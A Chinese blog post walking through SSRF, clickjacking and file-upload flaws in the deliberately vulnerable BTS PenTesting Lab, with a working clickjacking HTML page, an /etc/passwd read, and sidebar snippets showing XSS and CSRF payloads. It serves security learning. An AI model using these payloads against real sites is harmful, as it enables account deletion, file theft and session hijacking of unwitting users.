BTS PenTesting Lab - More..

最新推荐文章于 2024-08-02 21:11:49 发布
最新推荐文章于 2024-08-02 21:11:49 发布
阅读量876 收藏
点赞数
分类专栏: 漏洞演练系统 文章标签: btslab 漏洞演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zrools/article/details/50423816
版权

SSRF

Server-side Request Forgery

  • 源文件:/vulnerability/ssrf/ssrf.php

这里写图片描述

通过curl可获取图片,下载文件,读取文件内容等,尝试读取/etc/passwd

这里写图片描述

Clickjacking

  • 源文件:/vulnerability/clickjacking/cj.php

这里写图片描述

源码就是删除自己账户,利用视觉欺骗手段,让用户在不知情的情况下,点击攻击者欺骗的位置

简单demo (需登录)

<html>
    <head>
        <meta charset="utf-8" />
        <title>clickjacking demo</title>
        <style>
        html,body,iframe,div { 
            margin: 0px;
            padding: 0px;
            width: 100%;
            height: 100%;
            position:absolute;
        }
    </style>
    </head>
    <div style="z-index:999;opacity:0.3;">
        <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" src="http://192.168.1.228/vulnerability/clickjacking/cj.php"></iframe>
    </div>
    <button style="cursor:pointer;position:absolute;top:152px;left:475px;text-align:center;">点我</button>
</html>

这里写图片描述

比如说像这样,点击外面‘点我’按钮,却触发的是delete删除用户

这里写图片描述

Clickjacking

  • 源文件:/vulnerability/upload.php

这里写图片描述

可以上传任意文件,比如.php之类的文件,在uploads目录,并且文件名也没改动

zrools
关注
专栏目录
BTS PenTesting Lab - A1 Injection
zrools的博客
12-25 1138
SQL InjectionSql Injection 1 源文件:/btslab/vulnerability/ForumPosts.php # 第7行 mysql_query("DELETE from posts where postid='$id'") or die("Failed to Delete the post");# 第14行 $result=mysql_query("select *
public-pentesting-reports-master.rar
05-27
经典渗透测测试报告大全,干了几年渗透测试,都是土路子,学习学习让自己更专业。
BTS Pentesting Lab:BTS Pentesting Lab-一个故意易受攻击的Web应用程序-开源
05-27
BTS PenTesting Lab是一个开放源代码的易受攻击的Web应用程序,由网络安全和隐私基金会(www.cysecurity.org)创建。 它可用于了解许多不同类型的Web应用程序漏洞。 当前,该应用包含以下类型的漏洞:* SQL注入* XSS(包括基于Flash的xss)* CSRF *点击劫持* SSRF *文件包含*代码执行*不安全的直接对象引用*不受限制的文件上传漏洞*打开URL重定向*服务器Side Includes(SSI)注入和更多...此应用程序的Java版本可在此处找到:https://sourceforge.net/p/javavulnerablelab/
BTS PenTesting Lab - A3 XSS
zrools的博客
12-26 1503
Reflected(GET)Challenge 1 源文件://btslab/vulnerability/xss/xss1.php # 第8行 <?php if(isset($_GET['keyword'])) echo "No results found for ".$_GET['keyword']?>直接echo提交过来的内容,提交<script>alert('xss');</script>地址
btslab靶场-通过xss获取他人cookie并利用
最新发布
qq_39972370的博客
08-02 492
匿名攻击者在不知道他人账号密码的情况下,盗取cookie并利用他人身份在论坛活动。
BTS PenTesting Lab - A4 Insecure Direct Object References
zrools的博客
12-28 1023
不安全的直接对象引用 Viewing Details 源文件:/btslab/myprofile.php 关键代码地址http://192.168.1.228/myprofile.php?id=1 (需要先登录)像id=1这种容易猜测,如果没有判断权限,就容易出现信息泄露的问题,查询代码从头到尾都没有进行权限判断,只要任意登录用户都可以查询Modifying email ID 源文件:/btslab
BTS PenTesting Lab - A7 Missing Function Level Access Control
zrools的博客
12-29 1115
功能级权限控制缺失源文件:/admin/adminlogin.php 关键代码# 第16行 $result=mysql_query("select * from users where username='$username' and password='$password' and privilege='admin' ") or die(mysql_error());;username与passw
Java Vulnerable Lab - Pentesting Lab:故意易受攻击的 Web 应用程序-开源
05-30
这是由网络安全和隐私基金会 (www.cysecurity.org) 为 Java 程序员开发的易受攻击的 Web 应用程序有关 Hacking and Securing Web Java Programs 的完整课程可在 ...
NetSlaughter Pentesting Tool-开源
05-06
NetSlaughter是Nmap,Netcat,dsniff和tcpdump的GUI。 在Linux上运行,并用Java编码。 在接下来的修订中,我想使其成为多平台的,以便在Linux和Windows下运行
java红酒网站源码-Pentesting-Pratic-Notes:渗透测试笔记
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
BTS PenTesting Lab - A8 CSRF
zrools的博客
12-29 697
CSRF 1: Change Info 源文件:/vulnerability/csrf/changeinfo.php 由于是get请求,可以使用img等标签自动加载<img src="http://192.168.1.228/vulnerability/csrf/changeinfo.php?info=CSRF_TEST!&change=Change" /> 打开效果CSRF 2: Change E
btslab渗透测试实验室
03-02
这是对"btslab渗透测试实验室"的一个汉化版,github地址为:https://github.com/CSPF-Founder/btslab BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础。它可以用来了解许多不同类型的Web应用程序漏洞。 目前,该应用程序包含以下类型的漏洞: SQL注入 XSS(包括Flash XSS) CSRF 点击劫持 SSRF 文件包含 执行代码 不安全的直接对象引用 不受限制的文件上传漏洞 打开URL重定向 服务器端包含(SSI) 注入
BTS PenTesting Lab - Installation
zrools的博客
12-24 1112
漏洞类型 SQL Injection XSS(includes Flash Based xss) CSRF Clickjacking SSRF File Inclusion Code Execution Insecure Direct Object Reference Unrestricted File Upload vulnerability Open URL Redirection Server
BTS PenTesting Lab - A10 Unvalidated Redirect & Forward..
zrools的博客
12-29 686
Open Redirect 源文件:/vulnerability/url/open.php http://192.168.1.228/vulnerability/url/open.php?u=http://www.breakthesecurity.com修改u参数就可以任意跳转,可用于钓鱼等Open Forward 源文件:/vulnerability/url/forward.php 修改u参数就可
BTS渗透测试实验室----安装与实战
fendo
03-02 2824
一、简介 BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础(www.cysecurity.org)。它可以用来了解许多不同类型的Web应用程序漏洞。 目前,该应用程序包含以下类型的漏洞: ● SQL注入 ● XSS(包括Flash XSS) ● CSRF ● 点击劫持 ● SSRF ● 文件包含 ● 执行代码 ● 不安
搭建学习环境(十三)——BTS PenTesting Lab安装及通关记录
baynk的博客
05-28 957
好久没玩综合靶场了,其实没啥欲望,挺没意思的,不过由于某些特殊原因,还是慢慢更,争取把所有的这种综合靶场都复现一遍。 安装方式还是和原来基本一样,放到lamp或者wamp环境里面,改个数据库配置文件就可以了,配置文件为config.php。 官方下载地址不记得了,就放一个自己云盘的,下载地址:提取码: 2vyi ...
btslab全攻略——sql注入
小慌慌的博客
12-09 257
sql注入 百度百科--sql注入: sql注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执 行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所 致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 要了解sql语句以及php对数据库的操作,...
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
weixin_31185473的博客
08-09 504
之前做btslab的时候就想找篇完整教程来对照学习的,可是发现网上只有xss部分,并无完整攻略,所以就自己单独完成了btslab,整体感觉还是比较容易,不过对于新手还是很不错,可以学到很多漏洞知识与代码审计,为了造福刚入门或是想入门的新手,我打算开始出一系列教程,全面介绍btslab(尊重作者劳动成果,转载需注明出处,否则必究)一、远程文件包含在开发程序时,通常会将某些重复使用的函数,频繁使用的功...
btslab全攻略——搭建安装和sql注入
小慌慌的博客
11-14 1343
一、介绍 直接引用官方说明 BTS PenTesting Lab is an open source vulnerable web application, created by Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to learn about many different types of web application vulnerabilities. Currently, th
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值